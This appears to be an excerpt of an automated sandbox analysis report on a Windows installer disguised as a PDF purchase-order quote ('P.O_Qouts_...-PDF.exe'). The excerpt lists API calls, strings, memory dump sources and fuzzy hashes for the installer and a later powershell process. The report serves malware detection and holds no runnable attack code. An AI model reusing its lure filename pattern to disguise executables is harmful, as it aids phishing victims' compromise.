                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                    • String ID:
                                    • API String ID: 2667972263-0
                                    • Opcode ID: ee4a68396c29b08b741c613ff754ff0f0653b24d2e102e37bfb1fe53aeee4bcb
                                    • Instruction ID: 07af861edfd5d45cc772d4460453d41526fe3ac71611944f2ada717c13252223
                                    • Opcode Fuzzy Hash: ee4a68396c29b08b741c613ff754ff0f0653b24d2e102e37bfb1fe53aeee4bcb
                                    • Instruction Fuzzy Hash: 83218D72800128BBDF217FA5CE48D9E7E79EF09364F10423EF551762D1C67949418FA8
                                    APIs
                                    • lstrlenA.KERNEL32(nsvis Setup: Completed,nsvis Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048A9,000000DF,00000000,00000400,?), ref: 00404A2C
                                    • wsprintfA.USER32 ref: 00404A34
                                    • SetDlgItemTextA.USER32(?,nsvis Setup: Completed), ref: 00404A47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: ItemTextlstrlenwsprintf
                                    • String ID: %u.%u%s%s$nsvis Setup: Completed
                                    • API String ID: 3540041739-606326489
                                    • Opcode ID: e7c66190fb260b440250c96ec47e9d60e1422182a5b9567c4571bd7753034b60
                                    • Instruction ID: 1301199a10d6bfa0f795ae51e8cceb2c664c9f74d195b05cdaf9af1bfefcf64c
                                    • Opcode Fuzzy Hash: e7c66190fb260b440250c96ec47e9d60e1422182a5b9567c4571bd7753034b60
                                    • Instruction Fuzzy Hash: 7A11B7B36041286BEB0066799C46EAF32D9DB85374F250237FA26F61D1E9788C5281A9
                                    APIs
                                    • GetDlgItem.USER32(?,?), ref: 00401D7E
                                    • GetClientRect.USER32(?,?), ref: 00401DCC
                                    • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                    • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                    • DeleteObject.GDI32(00000000), ref: 00401E20
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                    • String ID:
                                    • API String ID: 1849352358-0
                                    • Opcode ID: 92fb06419dcf22d7c561d1c1cd7314035e184999ef60ddcb5701d42bd4b0d5ab
                                    • Instruction ID: 377f1368a79285744d6b6cf0b5e74a57d9b5ac4df0fb29ad0ac025f91be5ae75
                                    • Opcode Fuzzy Hash: 92fb06419dcf22d7c561d1c1cd7314035e184999ef60ddcb5701d42bd4b0d5ab
                                    • Instruction Fuzzy Hash: C8212872A00109AFCF15DFA4DD85AAEBBB5EB88300F24417EF911F62A1CB389941DB54
                                    APIs
                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: MessageSend$Timeout
                                    • String ID: !
                                    • API String ID: 1777923405-2657877971
                                    • Opcode ID: 7b70566c870daa96221156bf416f9a378a332c342d8049e94ba7da889c6dd66f
                                    • Instruction ID: 51da54adcba92585663a26c7e1368d4a3271239daaedb1c2ef7502cbfef702b9
                                    • Opcode Fuzzy Hash: 7b70566c870daa96221156bf416f9a378a332c342d8049e94ba7da889c6dd66f
                                    • Instruction Fuzzy Hash: 05216071A44208BEEB059FB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                    APIs
                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00405A5F
                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00405A68
                                    • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405A79
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A59
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CharPrevlstrcatlstrlen
                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                    • API String ID: 2659869361-823278215
                                    • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                    • Instruction ID: 4e9c794251620aa29aecb4049673505928abe3d31fb5bce1aa7abaa38b2a0d50
                                    • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                    • Instruction Fuzzy Hash: 2DD0A7A22015347AD20166254C06DDB690C8F02310B050066F200B2191C63C4C1147FD
                                    APIs
                                    • CharNextA.USER32(?,?,C:\,?,00405B5E,C:\,C:\,75923410,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B00
                                    • CharNextA.USER32(00000000), ref: 00405B05
                                    • CharNextA.USER32(00000000), ref: 00405B19
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CharNext
                                    • String ID: C:\
                                    • API String ID: 3213498283-3404278061
                                    • Opcode ID: 1e979eba324918ca677e02d4c6d61fe282ba8a8b0f982e42ab73b577f73820d9
                                    • Instruction ID: 371d989ad5315216d0c0cc34824f97af3956e00fc8829d3fd4d1a8d6fd0debac
                                    • Opcode Fuzzy Hash: 1e979eba324918ca677e02d4c6d61fe282ba8a8b0f982e42ab73b577f73820d9
                                    • Instruction Fuzzy Hash: 84F06251E14F956FFB3292680C44B777AA8CB95751F14407BD680762C286BC78408FAA
                                    APIs
                                    • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                    • GetTickCount.KERNEL32 ref: 00402E6E
                                    • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                    • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                    • String ID:
                                    • API String ID: 2102729457-0
                                    • Opcode ID: d2a126c8e87298d62dcb77b716532c519560652f5a9048845524fe30780812a8
                                    • Instruction ID: 90c5076a8d782885986fbf54e6784afd95d1d531b418d8ad00c0f3389847d2fc
                                    • Opcode Fuzzy Hash: d2a126c8e87298d62dcb77b716532c519560652f5a9048845524fe30780812a8
                                    • Instruction Fuzzy Hash: E1F05E30A41620EBC621BB60FE0CA8B7BA4FB84B81705493AF049B11E8C77448878BDC
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 0040518B
                                    • CallWindowProcA.USER32(?,?,?,?), ref: 004051DC
                                      • Part of subcall function 00404191: SendMessageA.USER32(00010434,00000000,00000000,00000000), ref: 004041A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Window$CallMessageProcSendVisible
                                    • String ID:
                                    • API String ID: 3748168415-3916222277
                                    • Opcode ID: 4e0d83b517ec3755641dbbc7163631964c054c7a669fd012e4d2f406caf64491
                                    • Instruction ID: 1a2e93e4b5b60595961c78cfe9b1f953e315c10ea79d8335bfdfcc16afa4850a
                                    • Opcode Fuzzy Hash: 4e0d83b517ec3755641dbbc7163631964c054c7a669fd012e4d2f406caf64491
                                    • Instruction Fuzzy Hash: 8B015E31A10709ABEB215F51DD85B5B3A7AEB84314F600537F6007A1D1C73A9C929A69
                                    APIs
                                    • FreeLibrary.KERNEL32(?,75923410,00000000,C:\Users\user\AppData\Local\Temp\,00403817,00403631,?,?,00000007,00000009,0000000B), ref: 00403859
                                    • GlobalFree.KERNEL32(00000000), ref: 00403860
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040383F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Free$GlobalLibrary
                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                    • API String ID: 1100898210-823278215
                                    • Opcode ID: d577bf8b0ad620a88e67a325e5e326df37630095cafad59fd52e64b4463e9122
                                    • Instruction ID: 8a9dc77c7c1ee1b135259636166a50b6bf5175fc084ac984c046f8d06e3dc5f9
                                    • Opcode Fuzzy Hash: d577bf8b0ad620a88e67a325e5e326df37630095cafad59fd52e64b4463e9122
                                    • Instruction Fuzzy Hash: 1BE0EC3350152057C661AF5AAA0475ABAEC7F48B22F05847AF884BB2618B745C429BDC
                                    APIs
                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe,C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe,80000000,00000003), ref: 00405AA6
                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe,C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe,80000000,00000003), ref: 00405AB4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CharPrevlstrlen
                                    • String ID: C:\Users\user\Desktop
                                    • API String ID: 2709904686-1246513382
                                    • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                    • Instruction ID: b7fadc1cb965da237d7d6f6ff84102907be402caa55b699d9cfbdae9487d107c
                                    • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                    • Instruction Fuzzy Hash: 98D0A9B25099B06EF303A2108C01B8F6A88CF13300F0A00A2E580E21A1C37C4C428BFD
                                    APIs
                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCF
                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BE7
                                    • CharNextA.USER32(00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BF8
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C01
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: lstrlen$CharNextlstrcmpi
                                    • String ID:
                                    • API String ID: 190613189-0
                                    • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                    • Instruction ID: 9eba209a39fe6667a971e8652d35f93e0e0dd93f5ee50219908c4175a565a31b
                                    • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                    • Instruction Fuzzy Hash: C7F0F631204914FFDB02DFA4DD40D9FBBA8EF56350B2540B9E840F7211D634EE01ABA8
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9cc241f39bb24f8d3cc9feac6c4d572f1bcb556661f407220ee14fc93b1e29bc
                                    • Instruction ID: b9b2f3e42b3835439f883edc96baf3976d1a5898c5c8b043f3c05c23f05f125b
                                    • Opcode Fuzzy Hash: 9cc241f39bb24f8d3cc9feac6c4d572f1bcb556661f407220ee14fc93b1e29bc
                                    • Instruction Fuzzy Hash: 69B14F70E002099FDF50CFA9D9857AEBFF6BF88304F148529DC15A7254EB749845CB8A
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0579dbe56809f8752fd7726e7baa774b51b6787169a79806cbd245d5fe606998
                                    • Instruction ID: 50288110e8d3637103ee6d2cd2816cdea4038c81e868485ff1c341b463963816
                                    • Opcode Fuzzy Hash: 0579dbe56809f8752fd7726e7baa774b51b6787169a79806cbd245d5fe606998
                                    • Instruction Fuzzy Hash: 7DB19F70E0020ADFDF50CFA8E8857ADBBF2BF88314F148529D819E7254EB749841CB96
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ee4cb1a99977ac570e414234baa0db650a6329972b7a05eefe3fb2cd4c178f3e
                                    • Instruction ID: 60235b71085ba317081540509bc9b555f73827ec5ed4a1510f3037e7e43c2012
                                    • Opcode Fuzzy Hash: ee4cb1a99977ac570e414234baa0db650a6329972b7a05eefe3fb2cd4c178f3e
                                    • Instruction Fuzzy Hash: 8541AF30B002048FDB19EB64D994AAE7BF6FF89750F144468E806EB3A4DB34AD41CB91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$x.{k$-{k
                                    • API String ID: 0-1827549809
                                    • Opcode ID: 75704c2d855188a3596625581e6633f1fd5033f21e9018d8aad3c1836292d44b
                                    • Instruction ID: 8a3e406fd70ad1f7ff838f6d6d6d1911d494b138f5262b6a08ede10e2bdf45d2
                                    • Opcode Fuzzy Hash: 75704c2d855188a3596625581e6633f1fd5033f21e9018d8aad3c1836292d44b
                                    • Instruction Fuzzy Hash: 788290B4B002049FEB24CBA8C955BAABBF2EF85314F1484E9D6099F351CB36DD45CB91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                    • API String ID: 0-1639310159
                                    • Opcode ID: 66046b7e9bd105248c5c2fee0a387596edf3765ce464dbb9c63a8c45f937c882
                                    • Instruction ID: fd874787af74ac5e5ddd3f8822f28dfab82e4bc5d4330c6f8a502c49d93e89f1
                                    • Opcode Fuzzy Hash: 66046b7e9bd105248c5c2fee0a387596edf3765ce464dbb9c63a8c45f937c882
                                    • Instruction Fuzzy Hash: 4E92B6B0A10244DFEB24CB98C584BA9BBB2FF85718F2085A9DA155F742CB76ED41CF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$4']q$4']q$x.{k$x.{k$-{k
                                    • API String ID: 0-774738033
                                    • Opcode ID: cabffadbb1696e96382b02af19de587bc236b07f737ca4a4eb078654091322cd
                                    • Instruction ID: 754b7b90cfc689decc825f7644e6078a047d4c93ba8fd149e7e5c018bb63fa3f
                                    • Opcode Fuzzy Hash: cabffadbb1696e96382b02af19de587bc236b07f737ca4a4eb078654091322cd
                                    • Instruction Fuzzy Hash: B99282B4B002149FEB24DB58C950BAABBB2EF89314F1085E8D9095F341CB76ED81CF91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$4']q$4']q$x.{k$-{k
                                    • API String ID: 0-3535003682
                                    • Opcode ID: 6bcd714935028eadca5cbf05df484ddec9e8a6e62975f13141ff573c7e9ec83c
                                    • Instruction ID: 94764f6fd7d7f86eff49bda359ced48c5c1cffc5a219109be4a608dc0f4b7bc3
                                    • Opcode Fuzzy Hash: 6bcd714935028eadca5cbf05df484ddec9e8a6e62975f13141ff573c7e9ec83c
                                    • Instruction Fuzzy Hash: 1EE1A0B0B102049FDB24DF98C654BAEBBA3EF88704F14C864D5016F355CB39E856CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$$]q$$]q$$]q
                                    • API String ID: 0-2353078639
                                    • Opcode ID: 1c71edec8136521232ec669730acdf9c82fb3fab9fb1fda6439190dc94422437
                                    • Instruction ID: 062821d9089881b675461a0871f3c3b69c0de54617e70557e1d41efd6a852ece
                                    • Opcode Fuzzy Hash: 1c71edec8136521232ec669730acdf9c82fb3fab9fb1fda6439190dc94422437
